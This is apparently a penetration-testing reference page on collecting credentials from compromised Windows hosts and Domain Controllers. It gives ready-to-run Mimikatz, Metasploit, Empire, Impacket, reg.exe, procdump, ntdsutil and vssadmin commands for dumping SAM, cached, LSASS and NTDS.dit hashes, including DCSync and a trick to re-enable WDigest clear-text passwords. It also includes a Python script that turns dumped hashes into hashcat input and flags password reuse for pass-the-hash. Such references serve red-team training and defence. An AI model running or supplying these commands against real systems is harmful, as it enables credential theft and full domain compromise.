System

Collect system credentials on a compromised Windows standard system or Windows Domain Controller.


SAM Hive

Windows systems store local account hashes in the SAM hive, located at C:\Windows\System32\config\SAM on disk and mounted at HKLM\SAM. Those hashes are encrypted using the SysKey (boot key), which is derived from the SYSTEM hive at C:\Windows\System32\config\SYSTEM (HKLM\SYSTEM). Both the SAM and SYSTEM files in C:\Windows\System32\config are locked while the OS is running and cannot be copied directly from a live system; use the registry save, shadow copy or offline techniques below.

Parse both hives locally using one of the following tools.

samdump2 [SYSTEM] [SAM]
secretsdump.py -sam [/path/to/SAM] -system [/path/to/SYSTEM] LOCAL

Physical Access

If you have physical access and the system does not use full disk encryption, boot a live Linux OS, mount the filesystem and copy both the SAM and SYSTEM hives from C:\Windows\System32\config.

Shell Access - reg.exe

Save both the SAM and SYSTEM hives from the registry using reg.exe (requires local administrator rights), retrieve them and parse them with the tools above.

reg.exe save hklm\sam [C:\path\to\output\file]
reg.exe save hklm\system [C:\path\to\output\file]

Mimikatz - lsadump::sam

Reads the SysKey and decrypts the SAM entries, either from the live registry (requires SYSTEM: run privilege::debug and token::elevate first) or from saved hives (/system:[SYSTEM] /sam:[SAM] options).

lsadump::sam

Metasploit - smart_hashdump

If the target is not a Domain Controller, the smart_hashdump module tries to extract hashes from the SAM database and falls back to injecting into LSASS memory if that fails.

use post/windows/gather/smart_hashdump

It seems the hashdump command of a meterpreter session now uses the same module.

Empire - sam

Uses PowerSploit’s Invoke-Mimikatz function to extract hashes from the SAM database.

interact [AGENT_NAME]
usemodule credentials/mimikatz/sam

Cache

In a Windows domain, the last domain logons (10 by default, controlled by the CachedLogonsCount setting) are cached so that users can still log on when no Domain Controller is reachable for authentication. These cached credentials are stored in the SECURITY hive and are encrypted using the SysKey from the SYSTEM hive. The hash format is MSCacheV1 (DCC1, Windows XP/2003) or MSCacheV2 (DCC2, Vista/2008 and later). DCC2 is a PBKDF2 construction (10240 iterations by default) and is therefore far slower to crack than an NT hash; cached hashes cannot be used for pass-the-hash, they have to be cracked.

Parse both hives locally using the Impacket secretsdump.py tool.

secretsdump.py -security [/path/to/SECURITY] -system [/path/to/SYSTEM] LOCAL

Physical Access

If you have physical access and the system does not have full disk encryption, boot on a live Linux OS, mount the filesystem and simply copy both SECURITY and SYSTEM hives.

Shell Access - reg.exe

Save both the SECURITY and SYSTEM hives using reg.exe and retrieve them on the attacker machine.

reg.exe save hklm\security [C:\path\to\output]
reg.exe save hklm\system [C:\path\to\output]

Mimikatz - lsadump::cache

Reads the SysKey, decrypts the NL$KM secret and then the MSCache entries, from the live registry (requires SYSTEM) or from saved hives (/system:[SYSTEM] /security:[SECURITY] options).

lsadump::cache

Metasploit - cachedump

The cachedump module uses the registry to extract the stored domain hashes.

run post/windows/gather/cachedump

Empire - cache

Runs PowerSploit’s Invoke-Mimikatz function to extract MSCache hashes.

interact [AGENT_NAME]
usemodule credentials/mimikatz/cache

LSASS

LSASS (lsass.exe) is the process that holds the passwords, hashes, keys, PIN codes and Kerberos tickets of logged-on users in memory. It is possible to extract this sensitive information either by reading from or injecting into the process, or by dumping its memory and parsing the dump offline.

In order to be able to interact with the lsass.exe process, you need to be either:

Injecting into LSASS can be dangerous on busy systems such as Domain Controllers or Terminal Servers and might crash the process, which reboots the system. When in doubt, dump the process memory and parse it offline.

SAM/NTDS

Ask the LSA server to retrieve all SAM/NTDS entries. This gives essentially the same information as reading the SAM database or the NTDS.dit file, but through the LSASS process.

This one is very risky and might crash the system if run on a Domain Controller managing a large domain.

Mimikatz - lsadump::lsa

There are two methods of performing this technique, /inject and /patch.

Since /inject needs PROCESS_CREATE_THREAD access to lsass.exe (it runs a thread inside the process), it is more likely to be caught in a well-monitored environment. However, /patch only displays LM and NT hashes, while /inject also returns the supplemental credentials (WDigest and Kerberos keys).

lsadump::lsa /inject
lsadump::lsa /patch 

Use the additional options to limit the query for a specific account.

lsadump::lsa /patch /id:[ACCOUNT_ID]
lsadump::lsa /patch /name:[ACCOUNT_NAME]

Reference: https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html

Metasploit - smart_hashdump

The smart_hashdump Metasploit module performs the same injection technique on Domain Controllers only, or on other systems where reading the SAM from the Registry is not possible.

use post/windows/gather/smart_hashdump

It seems the hashdump command of a meterpreter session now uses the same module.

Reference: https://www.darkoperator.com/blog/2011/5/19/metasploit-post-module-smart_hashdump.html

Meterpreter - kiwi - lsa_dump_sam

The kiwi meterpreter module has a lsa_dump_sam command that also performs the same injection technique.

load kiwi
lsa_dump_sam

Empire - lsadump

The lsadump Empire module performs the /patch technique and also allows specific accounts to be targeted. It dumps all account hashes if no username is specified.

interact [AGENT_NAME]
usemodule credentials/mimikatz/lsadump

Credentials Providers

Windows natively supports many different authentication protocols and providers (Security Support Providers) in order to be compatible with a wide variety of services. To provide a Single Sign-On experience, it keeps the credentials for each provider in LSASS memory. As some providers need the actual password to authenticate, it may be stored in clear text.

Store          Description
-------------  ------------------------------------------------------------------
MSV            Classic LM and NT hashes used for NTLM authentication.
WDigest        WDigest is a DLL first added in Windows XP that is used to authenticate users for HTTP Digest authentication and Simple Authentication and Security Layer (SASL) exchanges. Both require the user's plain-text password, so it is kept in memory (by default until Windows 8.1 / Server 2012 R2 and KB2871997).
Kerberos       The Kerberos package caches the user's Kerberos keys (derived from the password) and tickets; with unconstrained delegation the user's TGT is also forwarded from the client to the target server.
TsPkg          Provides single-sign-on functionality for Terminal Services (RDP) sessions.
LiveSSP & SSP  The Credential Security Support Provider (CredSSP) enables an application to securely delegate a user's credentials (password or smart card PIN) from a client to a target server. The difference with Kerberos is that the user has some control over whether the delegation should occur and which credentials should be used, so those credentials might differ from the Active Directory ones.
CredMan        When a web site or another computer requests authentication through NTLM or Kerberos, an "Update Default Credentials" or "Save Password" check box appears in the Net UI dialog box. If the user selects it, the Credential Manager keeps track of the user's name, password and related information for the authentication service in use, so those credentials might differ from the Active Directory ones.

See the post/windows/manage/wdigest_caching Metasploit module and the powershell/management/wdigest_downgrade Empire module to re-enable WDigest clear-text caching on patched systems (Windows 8.1 / Server 2012 R2 and later, or older systems with KB2871997): both set HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 1. The password only appears in memory for logons that happen after the change, and that registry write is a well-known detection point.

Except for MSV, we usually don’t know what credential provider is present in memory. Thus, most tools mentioned below try to extract credentials from all of them.

Mimikatz - sekurlsa

sekurlsa::logonPasswords

See also sekurlsa::msv, sekurlsa::wdigest, sekurlsa::tspkg, sekurlsa::livessp, sekurlsa::ssp and sekurlsa::credman for specific providers.

Meterpreter - kiwi

load kiwi
creds_all

See also creds_msv, creds_wdigest, creds_kerberos and creds_tspkg for specific providers.

Empire - logonpasswords

interact [AGENT_NAME]
usemodule credentials/mimikatz/logonpasswords

See also credentials/mimikatz/command and the above Mimikatz commands for specific providers.

Offline - procdump

As these credentials are collected from LSASS memory, it is also possible to create a dump of the lsass.exe process and parse it offline, for example with the procdump utility from Sysinternals (requires local administrator rights; -ma writes a full memory dump, which is what Mimikatz needs).

procdump.exe -accepteula -ma lsass.exe [OUTFILE.dmp]

Then load it in Mimikatz and use the above sekurlsa commands to parse the credentials. Mimikatz must run with the same architecture (x64/x86) as the dumped lsass.exe.

sekurlsa::minidump [OUTFILE.dmp]

Domain Controller Only

Active Directory stores account hashes in C:\Windows\NTDS\NTDS.dit. The hashes inside this file are encrypted with the Password Encryption Key (PEK), which is itself encrypted with the boot key stored in the C:\Windows\System32\config\SYSTEM registry hive. Neither NTDS.dit nor SYSTEM can be read directly, as they are always in use by the OS.

DC Replication Services (dcsync)

This technique abuses the Directory Replication Service protocol (MS-DRSR), which Domain Controllers use to replicate data between each other, to pull the password hash (and previous password hashes) of any account from a Domain Controller over the network, without requiring an interactive logon or copying off the Active Directory database file (ntds.dit). It requires the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object. By default these are held by Administrators, Domain Admins, Enterprise Admins and the Domain Controller computer accounts, but any principal granted those ACEs can run DCSync as well, so auditing the domain object's ACL for them is a useful check on both sides.

Collecting the krbtgt account hash alone is enough to fully compromise the domain (see Golden Tickets).

Mimikatz

Collect detailed information for a specific account (including hashes):

lsadump::dcsync /domain:[FQDN_DOMAIN] /user:[ACCOUNT]

Collect LM/NT hashes of all users:

lsadump::dcsync /domain:[FQDN_DOMAIN] /all /csv

Impacket secretsdump.py

The Impacket secretsdump.py tool allows you to perform the same operation from the attacker machine, even one that is not domain-joined, by targeting the Domain Controller with valid credentials (or an NT hash via -hashes).

Collect detailed information for a specific account (including hashes):

impacket-secretsdump -just-dc-user [ACCOUNT] [DOMAIN]/[USERNAME]:[PASSWORD]@[TARGET]

Collect LM/NT hashes of all users:

impacket-secretsdump -just-dc [DOMAIN]/[USERNAME]:[PASSWORD]@[TARGET]

Empire

The following modules use the Invoke-Mimikatz PowerShell function (from PowerSploit) to run the above Mimikatz commands.

Collect detailed information for a specific account (including hashes):

usemodule powershell/credentials/mimikatz/dcsync

Collect LM/NT hashes of all users:

usemodule powershell/credentials/mimikatz/dcsync_hashdump

Invoke-DCSync

Use the Invoke-DCSync.ps1 standalone module from the Empire framework to load a Mimikatz DLL in memory and call DCSync.

Collect detailed information for a specific account (including hashes):

Invoke-DCSync -AllData -Users [ACCOUNT]

Collect LM/NT hashes of all users:

Invoke-DCSync -PWDumpFormat

Use Invoke-DCSync from a Meterpreter session:

load powershell
powershell_import [/path/to/Invoke-DCSync.ps1]
powershell_execute Invoke-DCSync [see above for options]

Use Invoke-DCSync from an Empire agent:

scriptimport [/path/to/Invoke-DCSync.ps1]
scriptcmd Invoke-DCSync [see above for options]

Volume Shadow Copy

This technique makes a copy of the locked NTDS.dit and SYSTEM files so that the attacker can read them and parse the NTLM hashes. As those files are only stored on Domain Controllers, it requires some kind of access to a DC of the targeted domain.

Once both files have been retrieved, parse them locally using Impacket secretsdump.py.

secretsdump.py -ntds [/path/to/NTDS.dit] -system [/path/to/SYSTEM] LOCAL

On Kali Linux, impacket secretsdump.py has a different name: impacket-secretsdump.

Reference: https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/
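As an added example (not part of the original page and not Impacket code), the following Python triages the pwdump-style lines that secretsdump.py prints, both for SAM hives (-sam/-system LOCAL, see the SAM Hive section) and for NTDS.dit (-ntds/-system LOCAL, or -just-dc against a live DC). It flags blank passwords, accounts that still have an LM hash, password reuse (identical NT hashes) and machine accounts, and emits hashcat -m 1000 input. The sample output and every hash in it are constructed; only the two well-known empty LM/NT hash constants are real values.

```python
"""Triage pwdump-style lines from secretsdump.py (SAM or NTDS.dit output).

Line format:  user:rid:lmhash:nthash:::   (user is DOMAIN\\user in NTDS output)
Added example, not Impacket code. The sample output and its hashes are constructed.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when no LM password is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Constructed sample resembling 'secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL'.
SAMPLE = """\
[*] Target system bootKey: 0x1a2b3c4d5e6f70819a2b3c4d5e6f7081
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cb2a8b5a6e1f9d4c3b2a1f0e9d8c7b6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7f3b2c1d0e9f8a7b6c5d4e3f2a1b0c9d:::
CORP\\svc_backup:1105:e52cac67419a9a224a3b108f3fa6cb6d:cb2a8b5a6e1f9d4c3b2a1f0e9d8c7b6a:::
CORP\\jdoe:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CORP\\WS01$:1107:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""


def parse_pwdump(text: str):
    """Return one dict per well-formed hash line; status lines ([*] ...) are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return entries


def triage(entries):
    """The findings a tester acts on first."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        # an LM hash means a password of 14 chars or less, trivially crackable (hashcat -m 3000)
        "lm_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        # identical NT hashes mean identical passwords: reuse between admin and service accounts
        "password_reuse": {nt: users for nt, users in by_nt.items()
                           if len(users) > 1 and nt != EMPTY_NT},
        "machine_accounts": [e["user"] for e in entries if e["user"].endswith("$")],
    }


def hashcat_ntlm_lines(entries):
    """Input lines for 'hashcat -m 1000 --username'; blank NT hashes need no cracking."""
    return ["%s:%s" % (e["user"], e["nt"]) for e in entries if e["nt"] != EMPTY_NT]


if __name__ == "__main__":
    found = parse_pwdump(SAMPLE)
    for key, value in triage(found).items():
        print(key, value)
    print("\n".join(hashcat_ntlm_lines(found)))
```

Password reuse between a built-in Administrator and a service account, as in the constructed sample, is what turns a single NT hash into lateral movement by pass-the-hash, which is why the check runs before any cracking starts.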

Impacket secretsdump.py

The Impacket secretsdump.py tool automates this process remotely and can be run directly from the attacker machine by targeting the DC; -use-vss creates the shadow copy on the DC and copies the files out of it instead of using the DRSUAPI replication method.

secretsdump.py -just-dc -use-vss [DOMAIN]/[USERNAME]:[PASSWORD]@[HOSTNAME]

Metasploit - domain_hashdump

The domain_hashdump module automates this process without downloading and parsing the files on the attacker system. Instead, it uses the JET API on the target DC to parse hashes, in batches of 20, from the copied NTDS.dit file.

use post/windows/gather/credentials/domain_hashdump

This module sometimes fails while parsing NTDS.dit and stops before cleaning up the VSS copy. In that case, make sure you remove everything it left in C:\Windows\Temp and delete any leftover shadow copy manually.

NTDSUtil

Native command-line tool that provides management facilities for Active Directory and is available by default on every DC, so nothing has to be uploaded to the target. Its Install From Media (IFM) option produces a consistent copy of the database together with the SYSTEM hive.

ntdsutil
activate instance ntds
ifm
create full [C:\path\to\output\folder]
quit
quit

The above commands will create a copy of NTDS.dit in C:\path\to\output\folder\Active Directory and a copy of SYSTEM in C:\path\to\output\folder\registry.

VSSAdmin

Native command-line tool to manage Volume Shadow Copies. First, create a shadow copy of the system drive and note its ID and name from the output (sample values shown).

vssadmin create shadow /for=C:
    Shadow Copy ID: {e3e6bc3e-9402-4bca-9016-d1076d45dc70}
    Shadow Copy Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8

Copy both NTDS.dit and SYSTEM out of the shadow copy onto the regular file system, using the Shadow Copy Name as the path prefix.

copy [VSS_NAME]\Windows\NTDS\NTDS.dit [C:\path\to\output\folder]
copy [VSS_NAME]\Windows\System32\config\SYSTEM [C:\path\to\output\folder]

Clean up after yourself by deleting the shadow copy.

vssadmin delete shadows /Shadows=[VSS_ID] /Quiet